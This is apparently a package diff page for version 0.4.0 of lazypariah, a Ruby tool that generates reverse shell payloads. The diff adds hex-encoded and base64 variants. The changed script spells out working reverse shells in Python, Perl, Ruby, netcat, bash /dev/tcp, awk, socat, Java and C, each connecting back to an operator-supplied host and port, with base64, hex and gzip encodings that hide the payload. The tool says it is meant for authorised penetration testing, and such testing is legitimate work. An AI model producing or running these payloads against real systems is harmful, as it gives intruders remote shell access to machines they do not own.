lazypariah 0.3.0 → 0.4.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/bin/lazypariah +45 -7
- metadata +2 -2
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: a3aee611f4d7a3d19d4c7816eee540e7a2d0e04523e565719158e78fe365a026
|
4
|
+
data.tar.gz: 7f63871c91c193144da7182a32eabd9c401561deb8fbf1c6678ceb953a8d9a37
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: f049e7ff4764242aab6cee06bb8b9e314061d751241260e66045465e4dd38c926fe483886b7513c684d0ee9b26c8bb12d039f5f6ab8831b313856f7d431beb91
|
7
|
+
data.tar.gz: 48c488ee7a6776f336d7e806bcb914645ab04cc56cc0adda1c9aaeec70999b0f2b94ed30f7818c4e67d74bb5638b113889e3c938bd45d80c91932ddfb89a1a93
|
data/bin/lazypariah
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
#!/usr/bin/env ruby
|
2
2
|
#
|
3
3
|
# Title: LAZYPARIAH
|
4
|
-
# Version: 0.
|
4
|
+
# Version: 0.4.0
|
5
5
|
# Description:
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
@@ -29,7 +29,7 @@ require "stringio"
|
|
29
29
|
|
30
30
|
# Define constants.
|
31
31
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
32
|
-
PROGRAM_VERSION = "0.
|
32
|
+
PROGRAM_VERSION = "0.4.0".freeze()
|
33
33
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
34
34
|
|
35
35
|
# Define payload list.
|
@@ -41,6 +41,9 @@ PAYLOAD_LIST = [
|
|
41
41
|
"python3_b64",
|
42
42
|
"python2_b64",
|
43
43
|
"python_b64",
|
44
|
+
"python3_hex",
|
45
|
+
"python2_hex",
|
46
|
+
"python_hex",
|
44
47
|
"nc",
|
45
48
|
"nc_pipe",
|
46
49
|
"php_fd_3",
|
@@ -57,9 +60,12 @@ PAYLOAD_LIST = [
|
|
57
60
|
"php_fd_6_tags",
|
58
61
|
"perl",
|
59
62
|
"perl_c",
|
63
|
+
"perl_b64",
|
64
|
+
"perl_hex",
|
60
65
|
"ruby",
|
61
66
|
"ruby_c",
|
62
67
|
"ruby_b64",
|
68
|
+
"ruby_hex",
|
63
69
|
"bash_tcp",
|
64
70
|
"awk",
|
65
71
|
"socat",
|
@@ -68,8 +74,10 @@ PAYLOAD_LIST = [
|
|
68
74
|
"java_class_gzip_b64",
|
69
75
|
"c_binary",
|
70
76
|
"c_binary_b64",
|
77
|
+
"c_binary_hex",
|
71
78
|
"c_binary_gzip",
|
72
|
-
"c_binary_gzip_b64"
|
79
|
+
"c_binary_gzip_b64",
|
80
|
+
"c_binary_gzip_hex"
|
73
81
|
].sort()
|
74
82
|
|
75
83
|
# Define function for displaying program information.
|
@@ -166,12 +174,21 @@ begin
|
|
166
174
|
when "python3_b64"
|
167
175
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
168
176
|
print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
|
177
|
+
when "python3_hex"
|
178
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
179
|
+
print_output("echo #{code} | xxd -p -r - | python3", url_encode=url_encode)
|
169
180
|
when "python2_b64"
|
170
181
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
171
182
|
print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
|
183
|
+
when "python2_hex"
|
184
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
185
|
+
print_output("echo #{code} | xxd -p -r - | python2", url_encode=url_encode)
|
172
186
|
when "python_b64"
|
173
187
|
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
174
188
|
print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
|
189
|
+
when "python_hex"
|
190
|
+
code = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);".unpack("H*")[0]
|
191
|
+
print_output("echo #{code} | xxd -p -r - | python", url_encode=url_encode)
|
175
192
|
when "nc"
|
176
193
|
print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
|
177
194
|
when "nc_pipe"
|
@@ -204,6 +221,12 @@ begin
|
|
204
221
|
print_output("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};", url_encode=url_encode)
|
205
222
|
when "perl_c"
|
206
223
|
print_output("perl -e 'use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", url_encode=url_encode)
|
224
|
+
when "perl_b64"
|
225
|
+
code = Base64.strict_encode64("use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};")
|
226
|
+
print_output("echo #{code} | base64 -d | perl", url_encode=url_encode)
|
227
|
+
when "perl_hex"
|
228
|
+
code = "use Socket;$i=\"#{ARGV[1]}\";$p=#{ARGV[2]};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};".unpack("H*")[0]
|
229
|
+
print_output("echo #{code} | xxd -p -r - | perl", url_encode=url_encode)
|
207
230
|
when "ruby"
|
208
231
|
print_output("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end", url_encode=url_encode)
|
209
232
|
when "ruby_c"
|
@@ -211,12 +234,15 @@ begin
|
|
211
234
|
when "ruby_b64"
|
212
235
|
code = Base64.strict_encode64("require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end")
|
213
236
|
print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
|
237
|
+
when "ruby_hex"
|
238
|
+
code = "require \"socket\";exit if fork;c=TCPSocket.new(\"#{ARGV[1]}\",\"#{ARGV[2]}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end".unpack("H*")[0]
|
239
|
+
print_output("echo #{code} | xxd -p -r - | ruby", url_encode=url_encode)
|
214
240
|
when "bash_tcp"
|
215
241
|
print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
|
216
242
|
when "awk"
|
217
243
|
print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
|
218
244
|
when "socat"
|
219
|
-
print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
|
245
|
+
print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh", url_encode=url_encode)
|
220
246
|
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
|
221
247
|
code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
|
222
248
|
|
@@ -246,7 +272,7 @@ begin
|
|
246
272
|
end
|
247
273
|
|
248
274
|
system("rm -r #{temp_dir}")
|
249
|
-
when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
|
275
|
+
when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64", "c_binary_hex", "c_binary_gzip_hex"
|
250
276
|
code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
|
251
277
|
|
252
278
|
temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
|
@@ -261,7 +287,10 @@ begin
|
|
261
287
|
print_output(binary_payload)
|
262
288
|
when "c_binary_b64"
|
263
289
|
binary_payload_b64 = Base64.strict_encode64(binary_payload)
|
264
|
-
print_output(binary_payload_b64)
|
290
|
+
print_output(binary_payload_b64, url_encode=url_encode)
|
291
|
+
when "c_binary_hex"
|
292
|
+
binary_payload_hex = binary_payload.unpack("H*")[0]
|
293
|
+
print_output(binary_payload_hex)
|
265
294
|
when "c_binary_gzip"
|
266
295
|
sio = StringIO.new()
|
267
296
|
sio.binmode()
|
@@ -269,7 +298,7 @@ begin
|
|
269
298
|
gz.write(binary_payload)
|
270
299
|
gz.close()
|
271
300
|
binary_payload_gzip = sio.string
|
272
|
-
print_output(binary_payload_gzip
|
301
|
+
print_output(binary_payload_gzip)
|
273
302
|
when "c_binary_gzip_b64"
|
274
303
|
sio = StringIO.new()
|
275
304
|
sio.binmode()
|
@@ -279,6 +308,15 @@ begin
|
|
279
308
|
binary_payload_gzip = sio.string
|
280
309
|
binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
|
281
310
|
print_output(binary_payload_gzip_b64, url_encode=url_encode)
|
311
|
+
when "c_binary_gzip_hex"
|
312
|
+
sio = StringIO.new()
|
313
|
+
sio.binmode()
|
314
|
+
gz = Zlib::GzipWriter.new(sio)
|
315
|
+
gz.write(binary_payload)
|
316
|
+
gz.close()
|
317
|
+
binary_payload_gzip = sio.string
|
318
|
+
binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
|
319
|
+
print_output(binary_payload_gzip_hex)
|
282
320
|
end
|
283
321
|
end
|
284
322
|
|
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: lazypariah
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.
|
4
|
+
version: 0.4.0
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Peter Funnell
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2020-11-
|
11
|
+
date: 2020-11-24 00:00:00.000000000 Z
|
12
12
|
dependencies: []
|
13
13
|
description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
|
14
14
|
on the fly. It is intended to be used only in authorised circumstances by qualified
|